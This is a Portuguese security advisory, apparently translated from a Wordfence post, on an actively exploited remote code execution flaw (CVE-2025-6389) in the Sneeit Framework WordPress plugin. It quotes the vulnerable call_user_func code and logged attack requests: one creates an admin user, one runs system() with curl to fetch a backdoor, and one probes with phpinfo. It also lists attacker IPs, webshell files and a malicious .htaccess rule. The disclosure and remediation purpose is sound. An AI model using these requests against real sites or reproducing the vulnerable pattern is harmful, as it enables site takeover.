Ataques Ativos Exploram Falha Crítica no Plugin Sneeit Framework
Em 10 de junho de 2025, pesquisadores receberam um relatório sobre uma vulnerabilidade de Remote Code Execution (RCE) no Sneeit Framework, plugin WordPress presente em diversos temas premium e com cerca de 1.700 instalações ativas.
A falha permite que invasores executem código remotamente no servidor — um dos cenários mais perigosos possíveis.
O patch foi lançado em 5 de agosto de 2025, mas a divulgação pública aconteceu apenas em 24 de novembro de 2025. No mesmo dia, ataques começaram a ser registrados em massa.
O Firewall do Wordfence já bloqueou mais de 131.000 tentativas de exploração dessa vulnerabilidade.
Usuários de Wordfence Premium, Care e Response foram protegidos no dia 23 de junho, enquanto a versão gratuita recebeu a regra de proteção em 23 de julho de 2025.
A recomendação oficial é atualizar imediatamente para a versão 8.4, pois a exploração está ativa.
Resumo da Vulnerabilidade
| Item | Informação |
|---|---|
| Tipo | Execução Remota de Código (RCE) |
| Severidade (CVSS) | 9.8 – Crítico |
| CVE | CVE-2025-6389 |
| Versões Afetadas | ≤ 8.3 |
| Versão Corrigida | 8.4 |
| Plugin | Sneeit Framework |
| Função Vulnerável | sneeit_articles_pagination_callback() |
A falha ocorre porque o plugin aceita funções enviadas pelo usuário via AJAX e as executa com call_user_func(), sem qualquer validação. Isso permite que invasores chamem qualquer função PHP, com parâmetros também controlados via requisição.
Como a Exploração Funciona
A função vulnerável usa dois parâmetros:
- callback → nome da função PHP a ser executada
- args → parâmetros enviados pelo atacante
Exemplo simplificado do código vulnerável:
function sneeit_articles_pagination_callback() {
$callback = sneeit_get_server_request('callback');
if (function_exists($callback)) {
$args = sneeit_get_server_request('args');
$args = json_decode(trim(wp_unslash($args)), true);
call_user_func($callback, $args);
}
die();
}
Como não há restrição alguma, invasores conseguem:
✔ Criar usuários administradores
✔ Executar comandos no servidor
✔ Enviar arquivos maliciosos
✔ Instalar backdoors e webshells
✔ Obter controle total do site WordPress
Exemplos de Ataques Reais Registrados
1. Criação de usuário administrador malicioso
POST /wp-admin/admin-ajax.php
action=sneeit_articles_pagination
&callback=wp_insert_user
&args=user_login=arudikadis&role=administrator&...
2. Upload de backdoor com comando system()
action=sneeit_articles_pagination
&callback=system
&args="curl -sL https://[redacted]/.F/up_sf.txt -o tijtewmg.php"
3. Testes usando phpinfo()
action=sneeit_articles_pagination
&callback=phpinfo
&args=-1
IPs Mais Ativos Explorando a Falha
- 185.125.50.59 — +74.000 tentativas
- 182.8.226.51 — +24.200
- 89.187.175.80 — +4.600
- 194.104.147.192 — +2.600
- 196.251.100.39 — +2.100
- 114.10.116.226 — +1.500
- 116.234.108.143 — +1.200
Indicadores de Comprometimento
Seu site pode estar comprometido se houver:
🔴 Usuário administrador desconhecido criado recentemente
Invadores usam wp_insert_user() para escalar privilégios.
🔴 Arquivos suspeitos como:
xL.phpCanonical.php.a.phpsimple.phpup_sf.phptijtewmg.php
Esses arquivos geralmente possuem:
- leitor/editor de arquivos
- scanner de diretórios
- funções para extrair ZIP
- rotinas de privilégio
- localizador de webshells
🔴 Arquivos suspeitos no servidor
finderdata.txtgoodfinderdata.txt
🔴 .htaccess alterado para permitir execução de arquivos PHP
<FilesMatch '.(py|exe|phtml|php|...)$'>
Order allow,deny
Allow from all
</FilesMatch>
Esse comportamento é típico de invasões automatizadas.
🔴 Requisições AJAX vindas dos IPs listados
Verifique seus logs.
Domínios Envolvidos
racoonlab.top(já adicionado às listas de bloqueio)
Como Proteger Seu Site
- Atualize imediatamente para o Sneeit Framework 8.4
- Habilite firewall e regras atualizadas (Wordfence ou similar)
- Revise logs de AJAX
- Procure por arquivos maliciosos listados
- Remova usuários suspeitos
- Restaure arquivos alterados
- Verifique
.htaccess - Faça scan completo com scanner de malware
Fonte do post: https://www.wordfence.com/blog/2025/12/attackers-actively-exploiting-critical-vulnerability-in-sneeit-framework-plugin
